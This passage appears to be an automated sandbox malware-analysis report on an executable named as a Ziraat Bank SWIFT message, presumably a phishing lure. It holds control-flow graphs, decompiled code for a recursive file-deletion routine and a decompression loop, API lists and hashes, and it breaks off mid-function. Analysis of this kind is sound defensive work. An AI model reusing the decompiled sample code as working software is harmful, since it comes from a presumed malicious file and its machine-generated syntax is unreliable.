                                  control_flow_graph 248 4053aa-4053c5 call 405659 251 4053c7-4053d9 DeleteFileA 248->251 252 4053de-4053e8 248->252 253 405572-405575 251->253 254 4053ea-4053ec 252->254 255 4053fc-40540a call 405a85 252->255 256 4053f2-4053f6 254->256 257 40551d-405523 254->257 263 405419-40541a call 4055bf 255->263 264 40540c-405417 lstrcatA 255->264 256->255 256->257 257->253 259 405525-405528 257->259 261 405532-40553a call 405d7c 259->261 262 40552a-405530 259->262 261->253 272 40553c-405551 call 405578 call 40573d RemoveDirectoryA 261->272 262->253 266 40541f-405422 263->266 264->266 268 405424-40542b 266->268 269 40542d-405433 lstrcatA 266->269 268->269 271 405438-405456 lstrlenA FindFirstFileA 268->271 269->271 273 405513-405517 271->273 274 40545c-405473 call 4055a3 271->274 287 405553-405557 272->287 288 40556a-40556d call 404e23 272->288 273->257 276 405519 273->276 281 405475-405479 274->281 282 40547e-405481 274->282 276->257 281->282 284 40547b 281->284 285 405483-405488 282->285 286 405494-4054a2 call 405a85 282->286 284->282 291 4054f2-405504 FindNextFileA 285->291 292 40548a-40548c 285->292 298 4054a4-4054ac 286->298 299 4054b9-4054c8 call 40573d DeleteFileA 286->299 287->262 289 405559-405568 call 404e23 call 4057d3 287->289 288->253 289->253 291->274 295 40550a-40550d FindClose 291->295 292->286 296 40548e-405492 292->296 295->273 296->286 296->291 298->291 301 4054ae-4054b7 call 4053aa 298->301 308 4054ea-4054ed call 404e23 299->308 309 4054ca-4054ce 299->309 301->291 308->291 310 4054d0-4054e0 call 404e23 call 4057d3 309->310 311 4054e2-4054e8 309->311 310->291 311->291
                                  C-Code - Quality: 94%
                                  			E004053AA(void* __ebx, void* __eflags, void* _a4, signed int _a8) {
                                  				signed int _v8;
                                  				signed int _v12;
                                  				struct _WIN32_FIND_DATAA _v332;
                                  				signed int _t37;
                                  				char* _t49;
                                  				signed int _t52;
                                  				signed int _t55;
                                  				signed int _t61;
                                  				signed int _t63;
                                  				void* _t65;
                                  				signed int _t68;
                                  				CHAR* _t70;
                                  				CHAR* _t72;
                                  				char* _t75;
                                  
                                  				_t72 = _a4;
                                  				_t37 = E00405659(__eflags, _t72);
                                  				_v12 = _t37;
                                  				if((_a8 & 0x00000008) != 0) {
                                  					_t63 = DeleteFileA(_t72); // executed
                                  					asm("sbb eax, eax");
                                  					_t65 =  ~_t63 + 1;
                                  					 *0x423f28 =  *0x423f28 + _t65;
                                  					return _t65;
                                  				}
                                  				_t68 = _a8 & 0x00000001;
                                  				__eflags = _t68;
                                  				_v8 = _t68;
                                  				if(_t68 == 0) {
                                  					L5:
                                  					E00405A85(0x4214a0, _t72);
                                  					__eflags = _t68;
                                  					if(_t68 == 0) {
                                  						E004055BF(_t72);
                                  					} else {
                                  						lstrcatA(0x4214a0, "\*.*");
                                  					}
                                  					__eflags =  *_t72;
                                  					if( *_t72 != 0) {
                                  						L10:
                                  						lstrcatA(_t72, 0x40900c);
                                  						L11:
                                  						_t70 =  &(_t72[lstrlenA(_t72)]);
                                  						_t37 = FindFirstFileA(0x4214a0,  &_v332);
                                  						__eflags = _t37 - 0xffffffff;
                                  						_a4 = _t37;
                                  						if(_t37 == 0xffffffff) {
                                  							L29:
                                  							__eflags = _v8;
                                  							if(_v8 != 0) {
                                  								_t31 = _t70 - 1;
                                  								 *_t31 =  *(_t70 - 1) & 0x00000000;
                                  								__eflags =  *_t31;
                                  							}
                                  							goto L31;
                                  						} else {
                                  							goto L12;
                                  						}
                                  						do {
                                  							L12:
                                  							_t75 =  &(_v332.cFileName);
                                  							_t49 = E004055A3( &(_v332.cFileName), 0x3f);
                                  							__eflags =  *_t49;
                                  							if( *_t49 != 0) {
                                  								__eflags = _v332.cAlternateFileName;
                                  								if(_v332.cAlternateFileName != 0) {
                                  									_t75 =  &(_v332.cAlternateFileName);
                                  								}
                                  							}
                                  							__eflags =  *_t75 - 0x2e;
                                  							if( *_t75 != 0x2e) {
                                  								L19:
                                  								E00405A85(_t70, _t75);
                                  								__eflags = _v332.dwFileAttributes & 0x00000010;
                                  								if((_v332.dwFileAttributes & 0x00000010) == 0) {
                                  									E0040573D(_t72);
                                  									_t52 = DeleteFileA(_t72);
                                  									__eflags = _t52;
                                  									if(_t52 != 0) {
                                  										E00404E23(0xfffffff2, _t72);
                                  									} else {
                                  										__eflags = _a8 & 0x00000004;
                                  										if((_a8 & 0x00000004) == 0) {
                                  											 *0x423f28 =  *0x423f28 + 1;
                                  										} else {
                                  											E00404E23(0xfffffff1, _t72);
                                  											_push(0);
                                  											_push(_t72);
                                  											E004057D3();
                                  										}
                                  									}
                                  								} else {
                                  									__eflags = (_a8 & 0x00000003) - 3;
                                  									if(__eflags == 0) {
                                  										E004053AA(_t70, __eflags, _t72, _a8);
                                  									}
                                  								}
                                  								goto L27;
                                  							}
                                  							_t61 =  *((intOrPtr*)(_t75 + 1));
                                  							__eflags = _t61;
                                  							if(_t61 == 0) {
                                  								goto L27;
                                  							}
                                  							__eflags = _t61 - 0x2e;
                                  							if(_t61 != 0x2e) {
                                  								goto L19;
                                  							}
                                  							__eflags =  *((char*)(_t75 + 2));
                                  							if( *((char*)(_t75 + 2)) == 0) {
                                  								goto L27;
                                  							}
                                  							goto L19;
                                  							L27:
                                  							_t55 = FindNextFileA(_a4,  &_v332);
                                  							__eflags = _t55;
                                  						} while (_t55 != 0);
                                  						_t37 = FindClose(_a4);
                                  						goto L29;
                                  					}
                                  					__eflags =  *0x4214a0 - 0x5c;
                                  					if( *0x4214a0 != 0x5c) {
                                  						goto L11;
                                  					}
                                  					goto L10;
                                  				} else {
                                  					__eflags = _t37;
                                  					if(_t37 == 0) {
                                  						L31:
                                  						__eflags = _v8;
                                  						if(_v8 == 0) {
                                  							L39:
                                  							return _t37;
                                  						}
                                  						__eflags = _v12;
                                  						if(_v12 != 0) {
                                  							_t37 = E00405D7C(_t72);
                                  							__eflags = _t37;
                                  							if(_t37 == 0) {
                                  								goto L39;
                                  							}
                                  							E00405578(_t72);
                                  							E0040573D(_t72);
                                  							_t37 = RemoveDirectoryA(_t72);
                                  							__eflags = _t37;
                                  							if(_t37 != 0) {
                                  								return E00404E23(0xffffffe5, _t72);
                                  							}
                                  							__eflags = _a8 & 0x00000004;
                                  							if((_a8 & 0x00000004) == 0) {
                                  								goto L33;
                                  							}
                                  							E00404E23(0xfffffff1, _t72);
                                  							_push(0);
                                  							_push(_t72);
                                  							return E004057D3();
                                  						}
                                  						L33:
                                  						 *0x423f28 =  *0x423f28 + 1;
                                  						return _t37;
                                  					}
                                  					__eflags = _a8 & 0x00000002;
                                  					if((_a8 & 0x00000002) == 0) {
                                  						goto L31;
                                  					}
                                  					goto L5;
                                  				}
                                  			}

















                                  0x004053b5
                                  0x004053b9
                                  0x004053c2
                                  0x004053c5
                                  0x004053c8
                                  0x004053d0
                                  0x004053d2
                                  0x004053d3
                                  0x00000000
                                  0x004053d3
                                  0x004053e2
                                  0x004053e2
                                  0x004053e5
                                  0x004053e8
                                  0x004053fc
                                  0x00405403
                                  0x00405408
                                  0x0040540a
                                  0x0040541a
                                  0x0040540c
                                  0x00405412
                                  0x00405412
                                  0x0040541f
                                  0x00405422
                                  0x0040542d
                                  0x00405433
                                  0x00405438
                                  0x00405448
                                  0x0040544a
                                  0x00405450
                                  0x00405453
                                  0x00405456
                                  0x00405513
                                  0x00405513
                                  0x00405517
                                  0x00405519
                                  0x00405519
                                  0x00405519
                                  0x00405519
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040545c
                                  0x0040545c
                                  0x00405465
                                  0x0040546b
                                  0x00405470
                                  0x00405473
                                  0x00405475
                                  0x00405479
                                  0x0040547b
                                  0x0040547b
                                  0x00405479
                                  0x0040547e
                                  0x00405481
                                  0x00405494
                                  0x00405496
                                  0x0040549b
                                  0x004054a2
                                  0x004054ba
                                  0x004054c0
                                  0x004054c6
                                  0x004054c8
                                  0x004054ed
                                  0x004054ca
                                  0x004054ca
                                  0x004054ce
                                  0x004054e2
                                  0x004054d0
                                  0x004054d3
                                  0x004054d8
                                  0x004054da
                                  0x004054db
                                  0x004054db
                                  0x004054ce
                                  0x004054a4
                                  0x004054aa
                                  0x004054ac
                                  0x004054b2
                                  0x004054b2
                                  0x004054ac
                                  0x00000000
                                  0x004054a2
                                  0x00405483
                                  0x00405486
                                  0x00405488
                                  0x00000000
                                  0x00000000
                                  0x0040548a
                                  0x0040548c
                                  0x00000000
                                  0x00000000
                                  0x0040548e
                                  0x00405492
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004054f2
                                  0x004054fc
                                  0x00405502
                                  0x00405502
                                  0x0040550d
                                  0x00000000
                                  0x0040550d
                                  0x00405424
                                  0x0040542b
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004053ea
                                  0x004053ea
                                  0x004053ec
                                  0x0040551d
                                  0x00405520
                                  0x00405523
                                  0x00405575
                                  0x00405575
                                  0x00405575
                                  0x00405525
                                  0x00405528
                                  0x00405533
                                  0x00405538
                                  0x0040553a
                                  0x00000000
                                  0x00000000
                                  0x0040553d
                                  0x00405543
                                  0x00405549
                                  0x0040554f
                                  0x00405551
                                  0x00000000
                                  0x0040556d
                                  0x00405553
                                  0x00405557
                                  0x00000000
                                  0x00000000
                                  0x0040555c
                                  0x00405561
                                  0x00405562
                                  0x00000000
                                  0x00405563
                                  0x0040552a
                                  0x0040552a
                                  0x00000000
                                  0x0040552a
                                  0x004053f2
                                  0x004053f6
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004053f6

                                  APIs
                                  • DeleteFileA.KERNELBASE(?,?,"C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe" ,76D7F560), ref: 004053C8
                                  • lstrcatA.KERNEL32(004214A0,\*.*,004214A0,?,00000000,?,"C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe" ,76D7F560), ref: 00405412
                                  • lstrcatA.KERNEL32(?,0040900C,?,004214A0,?,00000000,?,"C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe" ,76D7F560), ref: 00405433
                                  • lstrlenA.KERNEL32(?,?,0040900C,?,004214A0,?,00000000,?,"C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe" ,76D7F560), ref: 00405439
                                  • FindFirstFileA.KERNEL32(004214A0,?,?,?,0040900C,?,004214A0,?,00000000,?,"C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe" ,76D7F560), ref: 0040544A
                                  • FindNextFileA.KERNEL32(?,00000010,000000F2,?), ref: 004054FC
                                  • FindClose.KERNEL32(?), ref: 0040550D
                                  Strings
                                  • "C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe" , xrefs: 004053B4
                                  • \*.*, xrefs: 0040540C
                                  • C:\Users\user~1\AppData\Local\Temp\, xrefs: 004053AA
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.293204636.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.293198616.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293230556.0000000000407000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293256524.0000000000409000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293314414.0000000000422000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293341301.0000000000429000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293356616.000000000042C000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                  • String ID: "C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe" $C:\Users\user~1\AppData\Local\Temp\$\*.*
                                  • API String ID: 2035342205-386577781
                                  • Opcode ID: 8a983a7928c03a7771966375b38950468f27bd10c21c4b06277df6b82eeec209
                                  • Instruction ID: 0322a8429cd808b8a7b2d486838befd4e4df4ca31dedcf7a9ac14dfd5c4716bd
                                  • Opcode Fuzzy Hash: 8a983a7928c03a7771966375b38950468f27bd10c21c4b06277df6b82eeec209
                                  • Instruction Fuzzy Hash: 2851CE30904A58BACB21AB219C85BFF3A78DF42719F14817BF901751D2CB7C4982DE6E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 520 40604c-406051 521 4060c2-4060e0 520->521 522 406053-406082 520->522 523 4066b8-4066cd 521->523 524 406084-406087 522->524 525 406089-40608d 522->525 529 4066e7-4066fd 523->529 530 4066cf-4066e5 523->530 526 406099-40609c 524->526 527 406095 525->527 528 40608f-406093 525->528 532 4060ba-4060bd 526->532 533 40609e-4060a7 526->533 527->526 528->526 531 406700-406707 529->531 530->531 535 406709-40670d 531->535 536 40672e-40673a 531->536 534 40628f-4062ad 532->534 537 4060a9 533->537 538 4060ac-4060b8 533->538 542 4062c5-4062d7 534->542 543 4062af-4062c3 534->543 539 406713-40672b 535->539 540 4068bc-4068c6 535->540 545 405ed0-405ed9 536->545 537->538 544 406122-406150 538->544 539->536 546 4068d2-4068e5 540->546 549 4062da-4062e4 542->549 543->549 547 406152-40616a 544->547 548 40616c-406186 544->548 554 4068e7 545->554 555 405edf 545->555 551 4068ea-4068ee 546->551 550 406189-406193 547->550 548->550 552 4062e6 549->552 553 406287-40628d 549->553 557 406199 550->557 558 40610a-406110 550->558 571 40626c-406284 552->571 572 40686e-406878 552->572 553->534 556 40622b-406235 553->556 554->551 560 405ee6-405eea 555->560 561 406026-406047 555->561 562 405f8b-405f8f 555->562 563 405ffb-405fff 555->563 567 40687a-406884 556->567 568 40623b-406404 556->568 577 406856-406860 557->577 578 4060ef-406107 557->578 569 4061c3-4061c9 558->569 570 406116-40611c 558->570 560->546 564 405ef0-405efd 560->564 561->523 574 405f95-405fae 562->574 575 40683b-406845 562->575 565 406005-406019 563->565 566 40684a-406854 563->566 564->554 576 405f03-405f49 564->576 579 40601c-406024 565->579 566->546 567->546 568->545 581 406227 569->581 583 4061cb-4061e9 569->583 570->544 570->581 571->553 572->546 582 405fb1-405fb5 574->582 575->546 584 405f71-405f73 576->584 585 405f4b-405f4f 576->585 577->546 578->558 579->561 579->563 581->556 582->562 586 405fb7-405fbd 582->586 587 406201-406213 583->587 588 4061eb-4061ff 583->588 592 405f81-405f89 584->592 593 405f75-405f7f 584->593 590 405f51-405f54 GlobalFree 585->590 591 405f5a-405f68 GlobalAlloc 585->591 594 405fe7-405ff9 586->594 595 405fbf-405fc6 586->595 589 406216-406220 587->589 588->589 589->569 596 406222 589->596 590->591 591->554 597 405f6e 591->597 592->582 593->592 593->593 594->579 598 405fd1-405fe1 GlobalAlloc 595->598 599 405fc8-405fcb GlobalFree 595->599 601 406862-40686c 596->601 602 4061a8-4061c0 596->602 597->584 598->554 598->594 599->598 601->546 602->569
                                  C-Code - Quality: 98%
                                  			E0040604C() {
                                  				unsigned short _t531;
                                  				signed int _t532;
                                  				void _t533;
                                  				void* _t534;
                                  				signed int _t535;
                                  				signed int _t565;
                                  				signed int _t568;
                                  				signed int _t590;
                                  				signed int* _t607;
                                  				void* _t614;
                                  
                                  				L0:
                                  				while(1) {
                                  					L0:
                                  					if( *(_t614 - 0x40) != 0) {
                                  						 *(_t614 - 0x34) = 1;
                                  						 *(_t614 - 0x84) = 7;
                                  						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
                                  						L132:
                                  						 *(_t614 - 0x54) = _t607;
                                  						L133:
                                  						_t531 =  *_t607;
                                  						_t590 = _t531 & 0x0000ffff;
                                  						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
                                  						if( *(_t614 - 0xc) >= _t565) {
                                  							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
                                  							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
                                  							 *(_t614 - 0x40) = 1;
                                  							_t532 = _t531 - (_t531 >> 5);
                                  							 *_t607 = _t532;
                                  						} else {
                                  							 *(_t614 - 0x10) = _t565;
                                  							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
                                  							 *_t607 = (0x800 - _t590 >> 5) + _t531;
                                  						}
                                  						if( *(_t614 - 0x10) >= 0x1000000) {
                                  							L139:
                                  							_t533 =  *(_t614 - 0x84);
                                  							L140:
                                  							 *(_t614 - 0x88) = _t533;
                                  							goto L1;
                                  						} else {
                                  							L137:
                                  							if( *(_t614 - 0x6c) == 0) {
                                  								 *(_t614 - 0x88) = 5;
                                  								goto L170;
                                  							}
                                  							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
                                  							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                                  							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                                  							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
                                  							goto L139;
                                  						}
                                  					} else {
                                  						__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                  						__esi =  *(__ebp - 0x60);
                                  						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                  						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                  						__ecx =  *(__ebp - 0x3c);
                                  						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                  						__ecx =  *(__ebp - 4);
                                  						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                  						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                  						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                  						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                  						if( *(__ebp - 0x38) >= 4) {
                                  							if( *(__ebp - 0x38) >= 0xa) {
                                  								_t97 = __ebp - 0x38;
                                  								 *_t97 =  *(__ebp - 0x38) - 6;
                                  							} else {
                                  								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                  							}
                                  						} else {
                                  							 *(__ebp - 0x38) = 0;
                                  						}
                                  						if( *(__ebp - 0x34) == __edx) {
                                  							__ebx = 0;
                                  							__ebx = 1;
                                  							L60:
                                  							__eax =  *(__ebp - 0x58);
                                  							__edx = __ebx + __ebx;
                                  							__ecx =  *(__ebp - 0x10);
                                  							__esi = __edx + __eax;
                                  							__ecx =  *(__ebp - 0x10) >> 0xb;
                                  							__ax =  *__esi;
                                  							 *(__ebp - 0x54) = __esi;
                                  							__edi = __ax & 0x0000ffff;
                                  							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                  							if( *(__ebp - 0xc) >= __ecx) {
                                  								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                  								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                  								__cx = __ax;
                                  								_t216 = __edx + 1; // 0x1
                                  								__ebx = _t216;
                                  								__cx = __ax >> 5;
                                  								 *__esi = __ax;
                                  							} else {
                                  								 *(__ebp - 0x10) = __ecx;
                                  								0x800 = 0x800 - __edi;
                                  								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                  								__ebx = __ebx + __ebx;
                                  								 *__esi = __cx;
                                  							}
                                  							 *(__ebp - 0x44) = __ebx;
                                  							if( *(__ebp - 0x10) >= 0x1000000) {
                                  								L59:
                                  								if(__ebx >= 0x100) {
                                  									goto L54;
                                  								}
                                  								goto L60;
                                  							} else {
                                  								L57:
                                  								if( *(__ebp - 0x6c) == 0) {
                                  									 *(__ebp - 0x88) = 0xf;
                                  									goto L170;
                                  								}
                                  								__ecx =  *(__ebp - 0x70);
                                  								__eax =  *(__ebp - 0xc);
                                  								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                  								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                  								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                  								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  								_t202 = __ebp - 0x70;
                                  								 *_t202 =  *(__ebp - 0x70) + 1;
                                  								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  								goto L59;
                                  							}
                                  						} else {
                                  							__eax =  *(__ebp - 0x14);
                                  							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                  							if(__eax >=  *(__ebp - 0x74)) {
                                  								__eax = __eax +  *(__ebp - 0x74);
                                  							}
                                  							__ecx =  *(__ebp - 8);
                                  							__ebx = 0;
                                  							__ebx = 1;
                                  							__al =  *((intOrPtr*)(__eax + __ecx));
                                  							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                  							L40:
                                  							__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                  							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                  							__ecx =  *(__ebp - 0x58);
                                  							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                  							 *(__ebp - 0x48) = __eax;
                                  							__eax = __eax + 1;
                                  							__eax = __eax << 8;
                                  							__eax = __eax + __ebx;
                                  							__esi =  *(__ebp - 0x58) + __eax * 2;
                                  							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                  							__ax =  *__esi;
                                  							 *(__ebp - 0x54) = __esi;
                                  							__edx = __ax & 0x0000ffff;
                                  							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                  							if( *(__ebp - 0xc) >= __ecx) {
                                  								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                  								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                  								__cx = __ax;
                                  								 *(__ebp - 0x40) = 1;
                                  								__cx = __ax >> 5;
                                  								__ebx = __ebx + __ebx + 1;
                                  								 *__esi = __ax;
                                  							} else {
                                  								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                  								 *(__ebp - 0x10) = __ecx;
                                  								0x800 = 0x800 - __edx;
                                  								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                  								__ebx = __ebx + __ebx;
                                  								 *__esi = __cx;
                                  							}
                                  							 *(__ebp - 0x44) = __ebx;
                                  							if( *(__ebp - 0x10) >= 0x1000000) {
                                  								L38:
                                  								__eax =  *(__ebp - 0x40);
                                  								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                  									while(1) {
                                  										if(__ebx >= 0x100) {
                                  											break;
                                  										}
                                  										__eax =  *(__ebp - 0x58);
                                  										__edx = __ebx + __ebx;
                                  										__ecx =  *(__ebp - 0x10);
                                  										__esi = __edx + __eax;
                                  										__ecx =  *(__ebp - 0x10) >> 0xb;
                                  										__ax =  *__esi;
                                  										 *(__ebp - 0x54) = __esi;
                                  										__edi = __ax & 0x0000ffff;
                                  										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                  										if( *(__ebp - 0xc) >= __ecx) {
                                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                  											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                  											__cx = __ax;
                                  											_t169 = __edx + 1; // 0x1
                                  											__ebx = _t169;
                                  											__cx = __ax >> 5;
                                  											 *__esi = __ax;
                                  										} else {
                                  											 *(__ebp - 0x10) = __ecx;
                                  											0x800 = 0x800 - __edi;
                                  											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                  											__ebx = __ebx + __ebx;
                                  											 *__esi = __cx;
                                  										}
                                  										 *(__ebp - 0x44) = __ebx;
                                  										if( *(__ebp - 0x10) < 0x1000000) {
                                  											L45:
                                  											if( *(__ebp - 0x6c) == 0) {
                                  												 *(__ebp - 0x88) = 0xe;
                                  												goto L170;
                                  											}
                                  											__ecx =  *(__ebp - 0x70);
                                  											__eax =  *(__ebp - 0xc);
                                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                  											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                  											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                  											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  											_t155 = __ebp - 0x70;
                                  											 *_t155 =  *(__ebp - 0x70) + 1;
                                  											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  										}
                                  									}
                                  									L53:
                                  									_t172 = __ebp - 0x34;
                                  									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
                                  									L54:
                                  									__al =  *(__ebp - 0x44);
                                  									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                  									L55:
                                  									if( *(__ebp - 0x64) == 0) {
                                  										 *(__ebp - 0x88) = 0x1a;
                                  										goto L170;
                                  									}
                                  									__ecx =  *(__ebp - 0x68);
                                  									__al =  *(__ebp - 0x5c);
                                  									__edx =  *(__ebp - 8);
                                  									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                  									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                  									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                  									 *( *(__ebp - 0x68)) = __al;
                                  									__ecx =  *(__ebp - 0x14);
                                  									 *(__ecx +  *(__ebp - 8)) = __al;
                                  									__eax = __ecx + 1;
                                  									__edx = 0;
                                  									_t191 = __eax %  *(__ebp - 0x74);
                                  									__eax = __eax /  *(__ebp - 0x74);
                                  									__edx = _t191;
                                  									L79:
                                  									 *(__ebp - 0x14) = __edx;
                                  									L80:
                                  									 *(__ebp - 0x88) = 2;
                                  									goto L1;
                                  								}
                                  								if(__ebx >= 0x100) {
                                  									goto L53;
                                  								}
                                  								goto L40;
                                  							} else {
                                  								L36:
                                  								if( *(__ebp - 0x6c) == 0) {
                                  									 *(__ebp - 0x88) = 0xd;
                                  									L170:
                                  									_t568 = 0x22;
                                  									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
                                  									_t535 = 0;
                                  									L172:
                                  									return _t535;
                                  								}
                                  								__ecx =  *(__ebp - 0x70);
                                  								__eax =  *(__ebp - 0xc);
                                  								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                  								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                  								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                  								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  								_t121 = __ebp - 0x70;
                                  								 *_t121 =  *(__ebp - 0x70) + 1;
                                  								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  								goto L38;
                                  							}
                                  						}
                                  					}
                                  					L1:
                                  					_t534 =  *(_t614 - 0x88);
                                  					if(_t534 > 0x1c) {
                                  						L171:
                                  						_t535 = _t534 | 0xffffffff;
                                  						goto L172;
                                  					}
                                  					switch( *((intOrPtr*)(_t534 * 4 +  &M004068EF))) {
                                  						case 0:
                                  							if( *(_t614 - 0x6c) == 0) {
                                  								goto L170;
                                  							}
                                  							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                                  							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                                  							_t534 =  *( *(_t614 - 0x70));
                                  							if(_t534 > 0xe1) {
                                  								goto L171;
                                  							}
                                  							_t538 = _t534 & 0x000000ff;
                                  							_push(0x2d);
                                  							asm("cdq");
                                  							_pop(_t570);
                                  							_push(9);
                                  							_pop(_t571);
                                  							_t610 = _t538 / _t570;
                                  							_t540 = _t538 % _t570 & 0x000000ff;
                                  							asm("cdq");
                                  							_t605 = _t540 % _t571 & 0x000000ff;
                                  							 *(_t614 - 0x3c) = _t605;
                                  							 *(_t614 - 0x1c) = (1 << _t610) - 1;
                                  							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
                                  							_t613 = (0x300 << _t605 + _t610) + 0x736;
                                  							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
                                  								L10:
                                  								if(_t613 == 0) {
                                  									L12:
                                  									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
                                  									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
                                  									goto L15;
                                  								} else {
                                  									goto L11;
                                  								}
                                  								do {
